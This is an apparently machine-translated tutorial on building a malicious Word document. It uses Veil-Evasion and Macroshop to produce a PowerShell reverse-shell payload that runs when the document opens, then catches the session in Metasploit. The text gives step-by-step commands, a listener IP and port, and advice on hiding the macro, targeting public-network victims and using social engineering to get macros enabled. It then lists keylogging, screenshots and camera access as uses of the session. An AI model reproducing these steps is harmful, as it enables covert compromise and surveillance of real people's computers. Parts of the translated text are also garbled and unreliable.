"Original" using Office macros to implement PowerShell payload remote control

This article demonstrates the payload and listeners needed to generate remote control using veil-evasion, and then uses Macroshop to generate payload-related VBA code, and finally demonstrates writing VBA code to the. doc text document in a macro.

Environment: Virtual Machine _kali

Dependency: Veil-evasion, Macroshop

0x00 Install veil-evasion, macroshop (birds can be bypassed)

This example uses Git installation.

Open Veil-evasion's github page: https://github.com/Veil-Framework/Veil-Evasion

As shown, click "Clone or download" to copy the URL.

Use the command under Kali (this example is root) Terminal:

git clone https://github.com/Veil-Framework/Veil-Evasion.git

Wait for the download to complete and perform the installation into the Veil-evasion directory. Execute command:

CD veil-evasion/

CD Setup

./setup.sh-c

You need to install git before you download it using the Git method, by executing the command:

　　  Apt-get-y Install git

Similarly installs Macroshop (Github:https://github.com/khr0x40sh/macroshop).

0x01 veil-evasion Generating Batch

Run the veil-evasion.py under Veil-evasion.

Under menu, enter "list" to see the corresponding labels for the payload that can be generated.

This example generates a PowerShell payload that uses the TCP protocol to connect to the communication.

Enter the corresponding number under menu and return. This example enters "24". Enter the payload configuration.

The current default configuration is NULL for the primary IP, and the listening port is 4444. Next, set the two parameters. By using ifconfig under Terminal to get the native IP, this example is 172.22.195.135.

Input:

Set Lhost 172.22.195.135 (carriage return)

Set Lport 4118 (carriage return)

So we've set it up. You can use the Info command to view current configuration information.

The port number is set to open a common port within the range of ports available to avoid occupancy. Refer to the computer network for the specific range of values.

Next, use the Generate command to generate the payload.

You need to name the payload file at this point, and the name will be determined by the user. This example is d0main_payload.

After the build succeeds, note the storage path and handle (Handler file) storage path of the record Payload (Payload file).

0x02 Macroshop generating VBA statements

Under Macroshop, execute the command:

./macro_safe.py Payload file output text Document

This example is:

./macro_safe.py/usr/share/veil-output/source/d0main_payload.bat D0main.txt

In this way, macroshop for us to generate a. txt file in its program directory, where the contents of the VBA code (is an open method, when the macro is enabled, the code will be automatically executed).

You can use VI D0main.txt to take a look at this text document.

Copy the main statement of this method, from Dim Command as String to Shell exec, Vbahide.

0x03 Creating a macro

Open a Word document,. doc or. docx. In the View tab, tap Macros.

In the Macro Name text box, enter the name of the macro you want to create (defined by the user), and then tap Create.

Randomly enter code mode and click on the left "Project"--"Microsoft Word object"--"ThisDocument" (double click).

In the code window that opens on the right, click the drop-down menu at the top left to select "Document" and select "Open" in the top right drop-down menu. Then paste the VBA code that you just copied.

Note When pasting the code, only paste between the private Sub Document_Open () and the End Sub.

After you click Save, you can turn it off. At this point, you have generated a Word document with payload that was implemented with Office macros.

0x04 Msfconsole under Monitoring

Back to Kali, execute the command in terminal:

Msfconsole-r Handle file

This opens the monitoring of the PowerShell payload.

0x06 on-line and remote control

Ensure that the listener is up and the listener will receive a live signal if the Word document we created above is opened and the macro is enabled. After waiting a few seconds, a session is generated (this example is session 1).

Enter: Sessions-i session number (carriage return) under MSF exploit (handler)

The session number here must be a live session number.

Then you can do remote control, such as viewing system information, screenshots, viewing the Process manager, closing the process, turning on the camera, recording the keyboard, and so on.

Description

This article chooses between the virtual machine and the host to demonstrate, if needs the remote control public network target, should fill in the Lhost own public net IP. We can do that with peanut shells.

One might say that the macro under the View tab exposes macros we create ourselves, such as the newpayload in this example. In fact, this macro can be removed from the place where it was created (see 0X03). This operation does not invalidate our payload. This will not find the macro we generated in the list, even if the other person looks in the macro.

In addition to the earlier versions of Office, most Office versions do not have macros enabled by default, so when you first open a document with macros, you are asked whether to "enable content", and to enable macros, we can use special tools such as social work. Do not repeat here.

Payload on-line, open win this end will start a PowerShell process that can be seen in Task Manager. If you take the initiative to end the process, the remote control will drop the line.

"Original" using Office macros to implement PowerShell payload remote control